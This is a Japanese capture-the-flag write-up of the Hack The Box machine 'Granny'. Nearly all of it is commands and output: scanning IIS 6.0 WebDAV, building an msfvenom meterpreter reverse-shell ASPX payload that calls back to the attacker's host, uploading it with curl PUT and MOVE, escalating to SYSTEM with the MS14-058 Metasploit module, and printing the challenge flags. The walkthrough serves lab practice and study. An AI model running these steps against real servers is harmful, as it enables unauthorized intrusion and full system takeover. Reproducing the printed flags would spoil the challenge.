80番ポートでfrontpageというアプリケーションが動作している
# nmap -A -n -F -T5 granny.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 13:09 UTC Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 67.33% done; ETC: 13:09 (0:00:01 remaining) Nmap scan report for granny.htb (10.10.10.15) Host is up (0.045s latency). Not shown: 99 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Server Date: Tue, 18 Aug 2020 13:15:25 GMT | WebDAV type: Unknown |_ Server Type: Microsoft-IIS/6.0 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: HP LaserJet 4250 printer (92%), OSRAM Lightify ZigBee gateway (91%), Microsoft Xbox game console (modified, running XboxMediaCenter) (91%), Denver Electronics AC-5000W MK2 camera (90%), Nintendo Wii game console (89%), SMC SMC8014WG WAP (89%), HP 170X print server or Inkjet 3000 printer (89%), HP PSC 2400-series Photosmart printer (88%), HP ProCurve 2524 switch or 9100c Digital Sender printer (88%), Netgear WGR614v7 wireless broadband router (88%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows # nmap -T4 --script vuln 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 13:10 UTC Nmap scan report for 10.10.10.15 Host is up (0.038s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /_vti_bin/: Frontpage file or folder | /_vti_log/: Frontpage file or folder | /postinfo.html: Frontpage file or folder | /_vti_bin/_vti_aut/author.dll: Frontpage file or folder | /_vti_bin/_vti_aut/author.exe: Frontpage file or folder | /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder | /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder | /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder | /_vti_bin/shtml.dll: Frontpage file or folder | /_vti_bin/shtml.exe: Frontpage file or folder | /images/: Potentially interesting folder |_ /_private/: Potentially interesting folder | http-frontpage-login: | VULNERABLE: | Frontpage extension anonymous login | State: VULNERABLE | Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise. | | References: |_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
WebDAVが有効であり、ファイルアップロードが可能
# perl nikto.pl -h http://granny.htb/ - ***** SSL support not available (see docs for SSL install) ***** - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.15 + Target Hostname: granny.htb + Target Port: 80 + Start Time: 2020-08-18 15:01:46 (GMT0) --------------------------------------------------------------------------- + Server: Microsoft-IIS/6.0 + Retrieved microsoftofficewebserver header: 5.0_Pub + Retrieved x-powered-by header: ASP.NET + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. + No CGI Directories found (use '-C all' to force check all possible dirs) + Retrieved dasl header: <DAV:sql> + Retrieved dav header: 1, 2 + Retrieved ms-author-via header: MS-FP/4.0,DAV + Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server. + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH + OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server. + WebDAV enabled (MKCOL COPY SEARCH PROPFIND LOCK PROPPATCH UNLOCK listed as allowed) + OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. + OSVDB-3233: /_vti_bin/: FrontPage directory found. + OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted). + OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252. + OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. + /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found. + Retrieved x-aspnet-version header: 1.1.4322 + 8110 requests: 6 error(s) and 26 item(s) reported on remote host + End Time: 2020-08-18 15:41:16 (GMT0) (2370 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # davtest --url http://granny.htb/ ******************************************************** Testing DAV connection OPEN SUCCEED: http://granny.htb ******************************************************** NOTE Random string for this session: 1qjcRJmh6BgKgoh ******************************************************** Creating directory MKCOL SUCCEED: Created http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh ******************************************************** Sending test files PUT html SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html PUT php SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.php PUT asp FAIL PUT cgi FAIL PUT jsp SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jsp PUT jhtml SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jhtml PUT shtml FAIL PUT txt SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt PUT aspx FAIL PUT cfm SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.cfm PUT pl SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.pl ******************************************************** Checking for test file execution EXEC html SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html EXEC php FAIL EXEC jsp FAIL EXEC jhtml FAIL EXEC txt SUCCEED: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt EXEC cfm FAIL EXEC pl FAIL ******************************************************** /usr/bin/davtest Summary: Created: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.php PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jsp PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jhtml PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.cfm PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.pl Executes: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html Executes: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt # echo "Test" > test.html # curl -X PUT http://granny.htb/test.html -d @test.html # curl http://granny.htb/test.html Test
Exploitコードをアップロードして、シェルを奪取する
# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.21 LPORT=4444 -o shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of aspx file: 2716 bytes Saved as: shell.aspx # mv shell.aspx shell.txt # curl -X PUT http://granny.htb/shell.txt --data-binary @shell.txt # curl -X MOVE --header 'Destination:http://granny.htb/shell.aspx' 'http://granny.htb/shell.txt' # msfconsole msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set LHOST 0.0.0.0 LHOST => 0.0.0.0 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 0.0.0.0:4444
サイトにアクセスすることでセッションが取得できる。すぐにセッションが切れるため、すぐにバックグラウンドに。
[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:34020) at 2020-08-20 14:04:59 +0000 background Background session 1? [y/N] y msf5 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell sparc/bsd 172.17.0.2:4444 -> 172.17.0.1:34058 (172.17.0.1)
他のWriteupではTypeがWindowsだったが、なぜかsparc/bsdだった。このせいでなかなか苦労した。
sysinfoから脆弱性を見つける
sysinfoデータ取得部分は割愛する。
# python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo /home/shimizu/granny/systeminfo.txt --quiet [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (ascii) [*] querying database file for potential vulnerabilities [*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits [*] there are now 356 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2003 SP2 32-bit' [*] [M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important [E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical [E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important [E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical [E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important [E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical [E] MS14-029: Security Update for Internet Explorer (2962482) - Critical [E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important [M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical [M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important [E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important [M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical [M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical [M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important [M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical [M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical [M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical [M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) x- Critical [M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important [M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important [M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important [M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical [M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical [M] MS08-078: Security Update for Internet Explorer (960714) - Critical [*] done
MS14-058より管理者権限を取得する
msf5 exploit(multi/handler) > use windows/local/ms14_058_track_popup_menu [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.21 LHOST => 10.10.14.21 msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit [!] SESSION may not be compatible with this module. [-] Handler failed to bind to 10.10.14.21:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] 172.17.0.1 - Command shell session 1 closed. [*] Sending stage (176195 bytes) to 172.17.0.1 [*] Meterpreter session 2 opened (172.17.0.2:4444 -> 172.17.0.1:34062) at 2020-08-20 14:23:31 +0000 [-] Exploit aborted due to failure: none: Session is already elevated [*] Exploit completed, but no session was created. msf5 exploit(windows/local/ms14_058_track_popup_menu) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x86/windows NT AUTHORITY\NETWORK SERVICE @ GRANNY 172.17.0.2:4444 -> 172.17.0.1:34062 (10.10.10.15) msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 2 SESSION => 2 msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit [-] Handler failed to bind to 10.10.14.21:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Launching notepad to host the exploit... [+] Process 3620 launched. [*] Reflectively injecting the exploit DLL into 3620... [*] Injecting exploit into 3620... [*] Exploit injected. Injecting payload into 3620... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (176195 bytes) to 172.17.0.1 [*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:34066) at 2020-08-20 14:24:25 +0000 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 2128 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>cd C:\Documents and Settings\Lakis\Desktop cd C:\Documents and Settings\Lakis\Desktop\ C:\Documents and Settings\Lakis\Desktop>type user.txt type user.txt 700c5dc163014e22b3e408f8703f67d1 C:\Documents and Settings\Lakis\Desktop>cd C:\Documents and Settings\Administrator\Desktop cd C:\Documents and Settings\Administrator\Desktop C:\Documents and Settings\Administrator\Desktop>type root.txt type root.txt aa4beed1c0584445ab463a6747bd06e9